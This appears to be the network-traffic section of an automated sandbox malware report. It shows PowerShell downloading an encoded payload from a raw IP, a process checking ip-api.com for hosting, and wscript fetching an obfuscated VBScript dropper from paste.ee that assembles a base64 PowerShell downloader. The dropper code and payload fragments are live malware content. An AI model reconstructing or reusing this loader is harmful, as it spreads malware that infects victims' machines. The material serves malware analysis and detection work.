0	192.168.2.4	49733	192.3.243.154	80	3744	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 06:54:17.374543905 CEST	72	OUT	GET /yobro.txt HTTP/1.1 Host: 192.3.243.154 Connection: Keep-Alive
Apr 24, 2024 06:54:17.539608955 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Tue, 23 Apr 2024 21:00:41 GMT Accept-Ranges: bytes ETag: "2d38da4cc195da1:0" Server: Microsoft-IIS/10.0 Date: Wed, 24 Apr 2024 04:54:17 GMT Content-Length: 325632 Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 44 45 41 41 41 41 4d 41 77 41 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 43 4e 34 54 65 73 4a 57 62 6c 4e 33 63 68 39 43 50 4b 30 67 50 76 5a 6d 62 4a 52 33 63 31 4a 48 64 76 77 44 49 67 6f 51 44 2b 6b 48 64 70 4a 58 64 6a 56 32 63 76 77 44 49 67 41 43 49 4b 30 67 50 7a 56 32 5a 6c 78 57 61 32 6c 6d 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DEAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lmcQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHI
Apr 24, 2024 06:54:17.539632082 CEST	1289	IN	Data Raw: 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c 78 6b 62 76 6c 47 64 31 4e 57 5a 34 56 45 5a 6c 52 33 63 6c 56 58 63 6c 4a 48 50 67 41 43 49 67 41 43 49 67 41 69 43 4e 34 6a 49 7a 59 6e 4c 74 4e 58 59 36 30 Data Ascii: iIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZm
Apr 24, 2024 06:54:17.539695978 CEST	1289	IN	Data Raw: 41 41 4a 41 41 41 41 41 41 77 62 41 59 47 41 75 42 51 53 41 55 47 41 73 42 51 61 41 59 45 41 79 42 51 59 41 59 46 41 42 41 41 41 41 51 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 77 Data Ascii: AAJAAAAAAwbAYGAuBQSAUGAsBQaAYEAyBQYAYFABAAAAQEAAAAAAAAAAAAAAAAAAAQAAAAAEAAAAAAAAAwPAAAAAAQAAAAAAAAAAEAAAAQAAAg/vTQvAAAAAAwTAYEAOBQSA8FAOBwTAkEATBgUAUEAWBwXAMFAWBAAAQjA8CAAAAAAAAAAAAQAqDwAjzFAAAAAAAAAAAAACwLADAOoAAAAQCAAAAAABAAAAAAAAAAAAAAAAAAA
Apr 24, 2024 06:54:17.539736986 CEST	1289	IN	Data Raw: 51 48 44 30 42 32 42 47 78 41 48 6b 51 49 52 49 51 41 67 55 41 48 63 34 67 44 44 41 67 42 49 45 53 45 6b 48 6f 45 4a 55 51 48 4a 6b 41 34 42 4b 42 43 48 41 42 43 49 30 68 45 44 63 67 42 49 45 53 45 6b 48 6f 45 49 55 51 48 49 59 77 42 4d 67 51 48 Data Ascii: QHD0B2BGxAHkQIRIQAgUAHc4gDDAgBIESEkHoEJUQHJkA4BKBCHABCI0hEDcgBIESEkHoEIUQHIYwBMgQHSIwBFgQUSUxgSMwBIgACF0RADAyBIElEF0RFDKBBHoQ/CKRgAKRUSEwAgsQ7CGREDGREDGRADACDFCoEAAQBNMoEBMoEBAAC5LoEGQQ9CKRHAAiBKkvgSEgAgcACIEgAgUQBDGBAgUQCDKBAAUACFMYEFMYEFMYEF
Apr 24, 2024 06:54:17.540029049 CEST	1289	IN	Data Raw: 47 59 6b 77 42 50 67 41 43 49 55 51 48 46 30 52 42 64 59 77 42 4c 67 41 43 49 67 41 43 46 30 68 42 48 6b 41 43 42 6f 77 41 49 67 41 43 49 55 51 48 46 63 41 43 49 55 51 48 56 49 6f 45 46 30 52 46 43 4b 52 42 48 30 41 43 4f 55 68 67 53 55 51 48 56 Data Ascii: GYkwBPgACIUQHF0RBdYwBLgACIgACF0hBHkACBowAIgACIUQHFcACIUQHVIoEF0RFCKRBH0ACOUhgSUQHVIoEFcADI4QFCKRBdUhgSUQHOcwBPgQFCKR0BKRBdUhgSUjgSkhgSUQHIcgFcIQAgQAgBKRAhDYEVgAHO0hECAiBIAYgSEQ4AGRFIUQHIUQHIUQH8FYEAGoEFUQBdIRHS8wBhgAfBGBgBKBgBKBgBKBgBKRHAGoEdA
Apr 24, 2024 06:54:17.540096045 CEST	1289	IN	Data Raw: 42 41 69 42 68 4a 59 45 4f 45 67 41 67 63 41 43 35 4a 52 2b 42 4b 52 42 64 55 51 48 74 47 6f 45 6c 48 6f 45 46 30 68 44 4a 63 51 46 49 67 67 44 64 41 55 67 53 55 51 48 49 34 67 44 4f 67 56 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 4f 45 51 54 53 55 Data Ascii: BAiBhJYEOEgAgcAC5JR+BKRBdUQHtGoElHoEF0hDJcQFIggDdAUgSUQHI4gDOgVgS4AQBKRANJRFOEQTSURDH8BCI4QHI4QHI4QHO0RlBKRICKhDVGoEhIoEO4QHO0hDO4QANJRFO0hDVcgKIknE5HoE5JR+BKhDBEOgRURrBKRrBKhDOEQTSUhDB0kEVswBkggDBEOgRUBQBKhDOEQTSUBQBKRANJRFGcQGCgRACASBIgACCAQ
Apr 24, 2024 06:54:17.540160894 CEST	1289	IN	Data Raw: 55 52 43 48 59 43 43 4a 47 6f 45 4a 47 6f 45 42 4d 41 41 4b 67 67 44 56 49 6f 45 46 30 52 30 42 4b 52 46 43 4b 52 42 64 55 51 48 46 30 52 42 64 55 51 48 31 49 6f 45 46 30 52 44 48 34 42 43 49 34 77 41 4f 34 67 42 48 67 51 42 49 45 41 41 45 67 41 Data Ascii: URCHYCCJGoEJGoEBMAAKggDVIoEF0R0BKRFCKRBdUQHF0RBdUQH1IoEF0RDH4BCI4wAO4gBHgQBIEAAEgAQBKBCO0RBdUQHIgQBd4AQBKRANJRFOwwBagACI0BCI0BCdgQHIgQHIgACI0BCd4wDHgBCIUQHIMAIHoACBAABxIYEtIYEpIYEOEABg0ACAFoEBEOgRUhDBEOgRUhDBEOgRUhDBEOgRUBQBKRANJRFAFoEC4ACIgAC
Apr 24, 2024 06:54:17.540214062 CEST	1289	IN	Data Raw: 41 43 4f 34 41 43 4f 34 41 43 4f 67 41 43 4f 45 51 54 53 55 42 43 4f 45 51 54 53 55 78 41 4f 45 51 54 53 55 68 44 53 63 41 49 49 67 41 43 49 51 77 42 47 77 68 44 4f 49 41 41 46 67 67 44 42 41 41 42 63 34 41 48 43 41 53 42 49 67 67 44 64 41 55 67 Data Ascii: ACO4ACO4ACOgACOEQTSUBCOEQTSUxAOEQTSUhDScAIIgACIQwBGwhDOIAAFggDBAABc4AHCASBIggDdAUgSEQTSUBQBKhDO4gDlGoEOUagS4AQBKRANJRFOcwIRHoEAASBIUQHOEggSUQHNHoEF0xBHABCI4QHAFoEF0RpBKhDlGoEOAUgSEQTSUhCHoBCI4QHAFoEB0kEVAUgS4gDdAUgSEQTSUBCHoBCAFoEB0kEVAUgS4QfB
Apr 24, 2024 06:54:17.540245056 CEST	1289	IN	Data Raw: 45 42 30 6b 45 56 73 77 42 68 67 51 42 42 41 41 42 49 67 51 42 64 4d 77 42 47 67 77 41 42 41 41 42 46 30 68 41 4f 55 61 67 53 45 41 49 47 55 61 67 53 59 41 42 49 4d 51 48 44 30 78 41 64 67 67 44 64 67 67 44 64 67 67 44 64 34 51 48 41 46 6f 45 46 Data Ascii: EB0kEVswBhgQBBAABIgQBdMwBGgwABAABF0hAOUagSEAIGUagSYABIMQHD0xAdggDdggDdggDd4QHAFoEF0hDlGoEOUagS4QpBKhDF0hDdAUgSEQTSUxFHETnBKBAgUAAT0BAgUACI4QHI4QHAFoEO4gDIUQHYFoEOAUgSEQTSUhDOEQTSUhDRcAJO0ZgSEAAG4QAhDYEVYAChEBCO0hDBEOgRUBQBKRBd4gDC0lEVUQHO4gDdg
Apr 24, 2024 06:54:17.540311098 CEST	1289	IN	Data Raw: 73 46 6f 45 42 45 4f 67 52 55 42 43 51 48 6f 45 42 30 6b 45 56 63 41 62 42 4b 52 41 4e 4a 52 46 48 67 51 64 52 34 51 48 51 48 6f 45 42 45 4f 67 52 55 42 62 42 4b 52 41 68 44 59 45 56 41 64 67 53 41 64 67 53 77 57 67 53 41 64 67 53 45 51 54 53 55 Data Ascii: sFoEBEOgRUBCQHoEB0kEVcAbBKRANJRFHgQdR4QHQHoEBEOgRUBbBKRAhDYEVAdgSAdgSwWgSAdgSEQTSUBbBKRANJRFKcgLdIBAgQwAd4QAgUgDdIRAgUAATAAIEAUgSEQ4AGRFIAwEBEOgRUBAgkAQBKRANJRFHgwAdUXEO0BQBKRAhDYEVAUgS0hEAFoEB0kEVgwBd4gDO4gDEAwBIUXEO0RdR4QH1FhDd4ACHAhDd4QAAUQ
Apr 24, 2024 06:54:17.699448109 CEST	1289	IN	Data Raw: 41 77 42 43 41 67 42 43 41 51 42 43 41 41 42 43 41 77 41 43 41 67 41 43 41 51 41 43 41 41 41 43 67 64 67 52 59 41 42 4f 55 51 48 42 49 41 41 47 34 67 44 42 49 41 41 46 6b 68 45 41 41 41 42 4f 6b 49 67 53 34 67 41 41 63 51 68 41 4b 52 67 41 4b 52 Data Ascii: AwBCAgBCAQBCAABCAwACAgACAQACAAACgdgRYABOUQHBIAAG4gDBIAAFkhEAAABOkIgS4gAAcQhAKRgAKRAAgAAeEQfSUBAeEQfSURABAxDAHYEGQAwBGhDBAgBO4gDdIAAGggDO4gDEAwBIAgHdARACEAEJAAAwDABAAwDAQAAAAA8EAAAA8ABAAAEAQAAAQAAEAAACAABAAAAARAtBGhBEAAAD8OBwGYEGQQBdUQHF0RADASC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	208.95.112.1	80	6160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 06:54:18.918140888 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Apr 24, 2024 06:54:19.078073025 CEST	175	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 04:54:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.84.67	443	6164	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 04:54:08 UTC	319	OUT	GET /d/gK5wA HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
2024-04-24 04:54:09 UTC	1244	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 04:54:08 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyc46gVFXf%2FDURqJGk%2BmAtqPexvMk0WTCPEg6kVXmGWJ3UvrJBwAv2%2FwAsOcijXIsA5SmgOPJ%2B6F%2BiHJ7B5xpGJbW%2FaRDYdFpIaYiP8CZ%2Bqcbo8N236ln5%2FfcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87937e5fcbd87d1f-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 04:54:09 UTC	125	IN	Data Raw: 33 34 30 39 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 70 69 74 68 65 63 6f 20 2c 20 61 63 68 61 76 61 73 63 61 64 6f 20 2c 20 65 6e 74 65 72 72 61 72 20 2c 20 62 65 78 69 67 61 6c 20 2c 20 65 78 63 75 72 73 61 72 20 2c 20 43 61 6d 61 20 2c 20 65 78 63 75 72 73 61 72 31 0d 0a 20 20 20 20 20 61 63 68 61 76 61 73 63 61 64 6f 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 65 6e 74 65 Data Ascii: 3409 dim pitheco , achavascado , enterrar , bexigal , excursar , Cama , excursar1 achavascado = " " ente
2024-04-24 04:54:09 UTC	1369	IN	Data Raw: 72 72 61 72 20 20 3d 20 22 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 Data Ascii: rrar = "" & bexigal & achavascado & bexigal & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHID
2024-04-24 04:54:09 UTC	1369	IN	Data Raw: 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f Data Ascii: eGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & bexigal & achavascado & bexigal & "gBvDgTreHIDgTre" & bexigal & achavascado
2024-04-24 04:54:09 UTC	1369	IN	Data Raw: 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44 Data Ascii: CgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & bexigal & achavascado & bexigal & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & bexigal & achavascado & bexigal & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGID
2024-04-24 04:54:09 UTC	1369	IN	Data Raw: 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 33 44 67 54 72 65 44 67 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 34 44 67 54 72 65 43 63 44 67 54 72 65 4b 51 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 51 67 42 35 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 7a 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 45 51 44 67 54 72 65 62 77 42 33 44 67 54 72 65 47 34 44 67 54 72 65 62 44 67 54 72 65 42 76 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 Data Ascii: gTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTre" & bexigal & achavascado & bexigal & "QBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTre" & bexigal &
2024-04-24 04:54:09 UTC	1369	IN	Data Raw: 65 55 67 42 55 44 67 54 72 65 44 34 44 67 54 72 65 50 67 44 67 54 72 65 6e 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 46 44 67 54 72 65 45 34 44 67 54 72 65 52 44 67 54 72 65 44 67 54 72 65 2b 44 67 54 72 65 44 34 44 67 54 72 65 4a 77 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 Data Ascii: eUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDg
2024-04-24 04:54:09 UTC	1369	IN	Data Raw: 44 67 54 72 65 6b 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 77 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 34 44 67 54 72 65 43 6b 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 Data Ascii: DgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTre" & bexigal & achavascado & bexigal & "wB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & bexigal & achavascado & bexigal & "QB4DgTreCkDgTreIDgTreB7DgTreCDgT
2024-04-24 04:54:09 UTC	1369	IN	Data Raw: 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 69 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 4d 44 67 54 72 65 62 77 42 74 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 51 67 42 35 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 62 65 78 69 67 61 6c 20 26 20 61 63 68 61 76 61 73 63 61 64 6f 20 26 20 62 65 78 69 67 61 6c 20 26 20 22 51 42 7a 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 46 73 44 67 54 Data Ascii: 